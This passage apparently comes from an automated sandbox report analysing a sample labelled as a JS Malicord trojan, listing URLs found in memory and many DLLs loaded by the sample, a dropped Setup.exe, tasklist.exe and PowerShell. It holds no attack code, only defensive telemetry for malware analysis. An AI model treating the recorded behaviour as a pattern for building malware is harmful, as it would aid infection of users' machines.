Source: powershell.exe, 0000000F.00000002.2450786406.0000014291D55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2436690487.00000142835D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2450786406.0000014291C12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2565356773.000001E0B96A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2608970599.000001E0C7DD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2608970599.000001E0C7F14000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://odvr.nic.cz/doh |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://odvr.nic.cz/dohodvr.nic.cz185.43.135.1193.17.47.12001:148f:fffe::12001:148f:ffff::1 |
Source: powershell.exe, 0000000F.00000002.2436690487.00000142832B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2565356773.000001E0B946C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://oneget.org |
Source: powershell.exe, 0000000F.00000002.2436690487.00000142832B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2565356773.000001E0B946C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://oneget.orgX |
Source: sw.pak.0.dr |
String found in binary or memory: https://passwords.google.comAkaunti |
Source: fr.pak.0.dr |
String found in binary or memory: https://passwords.google.comCompte |
Source: zh-CN.pak.0.dr |
String found in binary or memory: https://passwords.google.comGoogle |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://perfetto.dev/docs/contributing/getting-started#community). |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://perfetto.dev/docs/contributing/getting-started#community).No |
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr |
String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP |
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr |
String found in binary or memory: https://policies.google.com/ |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://public.dns.iij.jp/ |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://public.dns.iij.jp/IIJ |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://public.dns.iij.jp/dns-query |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://public.dns.iij.jp/dns-queryIijUShttps://nextdns.io/privacyNextDNShttps://chromium.dns.nextdn |
Source: fr.pak.0.dr |
String found in binary or memory: https://support.google.com/chrome/a/?p=block_warn |
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr |
String found in binary or memory: https://support.google.com/chrome/answer/6098869 |
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr |
String found in binary or memory: https://support.google.com/chromebook?p=app_intent |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://www.cisco.com/c/en/us/about/legal/privacy-full.html |
Source: zh-CN.pak.0.dr |
String found in binary or memory: https://www.google.com/chrome/privacy/eula_text.html |
Source: fr.pak.0.dr |
String found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlG |
Source: sw.pak.0.dr |
String found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlInasimamiwa |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://www.nic.cz/odvr/ |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://www.nic.cz/odvr/CZ.NIC |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://www.quad9.net/home/privacy/ |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://www.quad9.net/home/privacy/Quad9 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: dwmapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: oleacc.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: shfolder.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: windows.staterepositoryps.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: windows.fileexplorer.common.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: ntshrui.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: ffmpeg.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: uiautomationcore.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dbghelp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: winmm.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dwrite.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dhcpcsvc.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: powrprof.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: umpdc.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: kbdus.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: napinsp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: pnrpnsp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: wshbth.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: nlaapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: winrnr.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dpapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dhcpcsvc6.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: textinputframework.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: coreuicomponents.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: windows.ui.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: windowmanagementapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: inputhost.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: twinapi.appcore.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: twinapi.appcore.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: wtsapi32.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: winsta.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: mscms.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: coloradapterclient.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: mmdevapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: devobj.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: gpapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: fwpuclnt.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: framedynos.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: dbghelp.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: wbemcomn.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: winsta.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: ffmpeg.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: uiautomationcore.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dbghelp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: winmm.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dwrite.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dhcpcsvc.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: powrprof.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: umpdc.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dxgi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: resourcepolicyclient.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: mf.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: mfplat.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: rtworkq.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: msmpeg2vdec.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: mfperfhelper.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dxva2.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: msvproc.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dwmapi.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: framedynos.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: dbghelp.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: wbemcomn.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: winsta.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: atl.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mscoree.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: gpapi.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msisip.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wshext.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: appxsip.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: opcservices.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: dpapi.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: atl.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mscoree.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
